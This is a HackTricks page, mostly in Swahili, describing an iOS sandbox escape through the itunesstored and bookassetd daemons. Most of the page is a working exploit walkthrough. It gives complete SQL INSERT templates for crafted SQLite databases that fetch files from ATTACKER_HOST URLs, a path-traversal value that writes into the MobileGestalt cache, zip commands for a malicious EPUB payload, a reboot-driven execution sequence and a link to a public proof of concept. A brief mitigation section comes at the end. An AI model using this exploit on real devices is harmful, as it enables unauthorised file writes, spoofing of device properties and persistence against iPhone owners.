itunesstored & bookassetd Sandbox Escape

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Muhtasari

Utafiti wa hivi karibuni unaonyesha kwamba daemons mbili zilizowekwa awali kwenye iOS, itunesstored (menenja wa downloads) na bookassetd (Books / iBooks asset manager), zinaamini bila kuchuja metadata ya SQLite inayoweza kuandikwa na mtumiaji. Kwa kuacha faili zilizoandaliwa downloads.28.sqlitedb na BLDatabaseManager.sqlite pamoja na archive ndogo ya EPUB, mshambuliaji anayeweza kuandika katika /var/mobile/Media/ anaweza kuwalazimisha daemons hizi kufanya uandishi wa faili kwa njia nyingi za kumilikiwa na mobile ndani ya /private/var/. Primitives hizi zinaendelea kuwepo baada ya reboot na zinakuwezesha kubadilisha caches za system group kama systemgroup.com.apple.mobilegestaltcache ili kuficha mali za kifaa au kudumisha usanidi.

Sifa kuu:

Inafanya kazi kwenye vifaa hadi angalau iOS 26.2b1 (imejaribiwa kwenye iPhone 12 / iOS 26.0.1).
Malengo yanayoweza kuandikwa ni pamoja na caches za SystemGroup, /private/var/mobile/Library/FairPlay, /private/var/mobile/Media, na faili zingine zinazomilikiwa na mobile. Maandishi kwa faili zinazomilikiwa na root yanashindwa.
Inahitaji tu AFC-level access (nakili faili kwa USB) au foothold yoyote inayokuruhusu kubadilisha DB za SQLite lengwa na kupakia payloads.

Mfano wa Tishio & Mahitaji

Ufikiaji wa filesystem ya karibu kwa /var/mobile/Media/Downloads/ na /var/mobile/Media/Books/ (kupitia wateja wa AFC kama 3uTools, i4.cn, au afcclient kupitia USB, au uvunjaji wa awali).
HTTP server inayohudumia mafaili ya mshambuliaji (BLDatabaseManager.sqlite, iTunesMetadata.plist, crafted EPUB) zikiwa wazi kupitia URLs kama https://ATTACKER_HOST/fileprovider.php?type=....
Uwezo wa kureboot kifaa mara kadhaa ili kila daemon ianze upya na iendelee kuchukua database yake.
Ufahamu wa Books system-group UUID ili uandishi wa Stage 1 uje kwenye container sahihi (hupatikana kupitia syslog).

Stage 1 – Abusing `downloads.28.sqlitedb` via `itunesstored`

itunesstored inashughulikia /var/mobile/Media/Downloads/downloads.28.sqlitedb. Jedwali la asset lina URL + metadata ya destination na linachukuliwa kama pembejeo ya kuaminika. Kuunda safu inayorejelea URL ya mshambuliaji na kuweka local_path kwa .../Documents/BLDatabaseManager/BLDatabaseManager.sqlite ndani ya Books SystemGroup kunasababisha itunesstored kudownload na kubadilisha database ya Books na yaliyomo ya mshambuliaji wakati wa boot.

Pata UUID ya Books SystemGroup

Kusanya archive ya syslog kwa kutumia pymobiledevice3:

pymobiledevice3 syslog collect logs.logarchive

Fungua logs.logarchive katika Console.app na tafuta bookassetd [Database]: Store is at file:///private/var/containers/Shared/SystemGroup/<UUID>/Documents/BLDatabaseManager/BLDatabaseManager.sqlite.
Rekodi <UUID> na uibadilishe katika payload ya SQL.

Malicious `asset` row

Kiolezo cha INSERT cha Stage 1

```sql INSERT INTO "main"."asset" ( "pid","download_id","asset_order","asset_type","bytes_total", "url","local_path","destination_url","path_extension","retry_count", "http_method","initial_odr_size","is_discretionary","is_downloaded", "is_drm_free","is_external","is_hls","is_local_cache_server", "is_zip_streamable","processing_types","video_dimensions", "timeout_interval","store_flavor","download_token","blocked_reason", "avfoundation_blocked","service_type","protection_type", "store_download_key","etag","bytes_to_hash","hash_type","server_guid", "file_protection","variant_id","hash_array","http_headers", "request_parameters","body_data","body_data_file_path","sinfs_data", "dpinfo_data","uncompressed_size","url_session_task_id" ) VALUES ( 1234567890,6936249076851270150,0,'media',NULL, 'https://ATTACKER_HOST/fileprovider.php?type=sqlite', '/private/var/containers/Shared/SystemGroup//Documents/BLDatabaseManager/BLDatabaseManager.sqlite', NULL,'epub',6,'GET',NULL,0,0,0,1,0,0,0,0, NULL,60,NULL,466440000,0,0,0,0,'',NULL,NULL,0, NULL,NULL,NULL,X'62706c6973743030a1015f1020...',NULL,NULL,NULL,NULL,NULL,NULL,0,1 ); ```

Mashamba muhimu:

url: attacker-controlled endpoint returning the malicious BLDatabaseManager.sqlite.
local_path: Books system-group BLDatabaseManager.sqlite file iliyobainishwa hapo juu.
Bendera za udhibiti: weka chaguo za msingi (asset_type='media', path_extension='epub', booleans zimesetwa 0/1 kama katika template) ili daemon ikubali kazi.

Utekelezaji

Futa yafuatayo ya zamani /var/mobile/Media/Downloads/* ili kuepuka mashindano.
Badilisha downloads.28.sqlitedb na DB iliyotengenezwa kupitia AFC.
Weka upya → itunesstored inapakua database ya Stage 2 na inaweka /var/mobile/Media/iTunes_Control/iTunes/iTunesMetadata.plist.
Nakili plist hiyo hadi /var/mobile/Media/Books/iTunesMetadata.plist; Stage 2 inatarajia kuiweka huko.

Stage 2 – Kutumia vibaya `BLDatabaseManager.sqlite` kupitia `bookassetd`

bookassetd ina entitlements za filesystem pana zaidi na inaamini jedwali la ZBLDOWNLOADINFO. Kwa kuingiza safu bandia ya ununuzi inayorejelea attacker URLs na traversal katika ZPLISTPATH, daemon inapakua EPUB yako hadi /var/mobile/Media/Books/asset.epub na baadaye inafungua metadata ndani ya path yoyote iliyomilikiwa na mobile inayofikika kupitia nukta za kutoroka ../../...

Safu hatari ya `ZBLDOWNLOADINFO`

Kiolezo cha INSERT cha Stage 2

```sql INSERT INTO "ZBLDOWNLOADINFO" ( "Z_PK","Z_ENT","Z_OPT","ZACCOUNTIDENTIFIER","ZCLEANUPPENDING", "ZFAMILYACCOUNTIDENTIFIER","ZISAUTOMATICDOWNLOAD","ZISLOCALCACHESERVER", "ZISPURCHASE","ZISRESTORE","ZISSAMPLE","ZISZIPSTREAMABLE", "ZNUMBEROFBYTESTOHASH","ZPERSISTENTIDENTIFIER","ZPUBLICATIONVERSION", "ZSERVERNUMBEROFBYTESTOHASH","ZSIZE","ZSTATE","ZSTOREIDENTIFIER", "ZSTOREPLAYLISTIDENTIFIER","ZLASTSTATECHANGETIME","ZPURCHASEDATE", "ZSTARTTIME","ZARTISTNAME","ZARTWORKPATH","ZASSETPATH", "ZBUYPARAMETERS","ZCANCELDOWNLOADURL","ZCLIENTIDENTIFIER", "ZCOLLECTIONARTISTNAME","ZCOLLECTIONTITLE","ZDOWNLOADID", "ZDOWNLOADKEY","ZENCRYPTIONKEY","ZEPUBRIGHTSPATH","ZFILEEXTENSION", "ZGENRE","ZHASHTYPE","ZKIND","ZMD5HASHSTRINGS","ZORIGINALURL", "ZPERMLINK","ZPLISTPATH","ZSALT","ZSUBTITLE","ZTHUMBNAILIMAGEURL", "ZTITLE","ZTRANSACTIONIDENTIFIER","ZURL","ZRACGUID","ZDPINFO", "ZSINFDATA","ZFILEATTRIBUTES" ) VALUES ( 1,2,3,0,0,0,0,'',NULL,NULL,NULL,NULL, 0,0,0,NULL,4648,2,'765107108',NULL, 767991550.119197,NULL,767991353.245275,NULL,NULL, '/private/var/mobile/Media/Books/asset.epub', 'productType=PUB&salableAdamId=765107106&...', 'https://p19-buy.itunes.apple.com/...', '4GG2695MJK.com.apple.iBooks','Sebastian Saenz','Cartas de Amor a la Luna', '../../../../../../private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library', NULL,NULL,NULL,NULL,'Contemporary Romance',NULL,'ebook',NULL,NULL,NULL, '/private/var/mobile/Media/Books/iTunesMetadata.plist',NULL, 'Cartas de Amor a la Luna','https://ATTACKER_HOST/fileprovider.php?type=gestalt', 'Cartas de Amor a la Luna','J19N_PUB_190099164604738', 'https://ATTACKER_HOST/fileprovider.php?type=gestalt2',NULL,NULL,NULL,NULL ); ```

Important fields:

ZASSETPATH: eneo la EPUB kwenye disk lililodhibitiwa na attacker.
ZURL/ZPERMLINK: URLs za attacker zinazohost EPUB na plist ya ziada.
ZPLISTPATH: ../../../../../private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library – the path traversal base iliyoungizwa kwa faili zilizotolewa kutoka EPUB. Rekebisha traversal depth kufikia SystemGroup unayotaka.
Purchase metadata (ZSTOREIDENTIFIER, names, timestamps) yanaiga rekodi halali ili daemon isifute row.

Baada ya kunakili DB haribifu ndani ya /private/var/containers/Shared/SystemGroup/<UUID>/Documents/BLDatabaseManager/BLDatabaseManager.sqlite (kwa msaada wa Stage 1) na kuanzisha upya mara mbili, bookassetd itafanya (1) download EPUB, (2) kuichakata na kuandika plist iliyotokana chini ya njia iliyopitiwa.

Kuunda EPUB Payload

bookassetd inaheshimu muundo wa EPUB ZIP: mimetype lazima iwe ingizo la kwanza lisilofinyangwa. Ili ramani yaliyomo ya EPUB kwenye cache ya MobileGestalt, jenga mti wa directory unaoakisi njia unayotaka kuhusiana na ZPLISTPATH.

Caches/
├── mimetype
└── com.apple.MobileGestalt.plist

Unda arhivu:

zip -X0 hax.epub Caches/mimetype
zip -Xr9D hax.epub Caches/com.apple.MobileGestalt.plist

mimetype kwa kawaida ina maneno application/epub+zip.
Caches/com.apple.MobileGestalt.plist ina payload inayodhibitiwa na mshambuliaji ambayo itaweka kwa .../Library/Caches/com.apple.MobileGestalt.plist.

Mtiririko wa Utekelezaji

Prepare files kwenye attacker HTTP server na tengeneza SQLite DB zote mbili zenye thamani maalum za host/UUID.
Replace downloads.28.sqlitedb kwenye kifaa na washa upya → Stage 1 inashusha BLDatabaseManager.sqlite mbaya na inatoa /var/mobile/Media/iTunes_Control/iTunes/iTunesMetadata.plist.
Copy iTunesMetadata.plist kwenda /var/mobile/Media/Books/iTunesMetadata.plist (rudia ikiwa daemon itaifuta).
Washa upya tena → bookassetd inashusha asset.epub kwenda /var/mobile/Media/Books/ ikitumia metadata ya Stage 2.
Washa upya kwa tatu → bookassetd inashughulikia asset iliyopakuliwa, inafuata ZPLISTPATH, na inaandika yaliyomo ya EPUB kwenye njia ya SystemGroup iliyolengwa (mfano, com.apple.MobileGestalt.plist).
Thibitisha kwa kusoma plist iliyobadilishwa au kwa kuona kwamba mali zilizoanzishwa na MobileGestalt (model identifier, activation flags, n.k.) zimebadilika ipasavyo.

Mfumo huo ule unakuwezesha kuweka faili katika cache nyingine zilizo milikiwa na mobile, kama FairPlay state au persistence directories, kuruhusu kuingilia kimyakimya bila haja ya kernel exploit.

Zana & Vidokezo vya Uendeshaji

pymobiledevice3 syslog collect logs.logarchive – chukua archives za logi ili kugundua Books SystemGroup UUID.
Console.app – chuja kwa bookassetd [Database]: Store is at ... ili kupata njia kamili ya container.
AFC clients (afcclient, 3uTools, i4.cn) – push/pull SQLite DBs na plist files kupitia USB bila jailbreak.
zip – lazimisha vigezo vya mpangilio wa EPUB wakati wa kufunga payloads.
Public PoC – https://github.com/hanakim3945/bl_sbx ina templates za msingi za SQLite/EPUB ambazo unaweza kubadilisha.

Mawazo ya Ugunduzi na Kupunguza

Chukulia downloads.28.sqlitedb na BLDatabaseManager.sqlite kama pembejeo zisizotegemewa: thibitisha kwamba local_path / ZPLISTPATH zinabaki ndani ya sandboxes zilizokubaliwa na kata njia zilizo na path kamili au token za traversal.
Fuatilia kwa maandishi ya AFC yanayobadilisha database hizi au kwa downloads zisizotarajiwa zilizoanzishwa na itunesstored / bookassetd mara baada ya boot.
Imarisha unpacking ya bookassetd kwa kutumia realpath() kwenye lengo la pato na uhakikishe haiwezi kutoroka kutoka Books container kabla ya kuandika faili.
Punguza njia za AFC / USB za kunakili faili au hitaji mwingiliano wa mtumiaji kabla ya kuruhusu kubadilishwa kwa faili za metadata za Books/iTunes.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.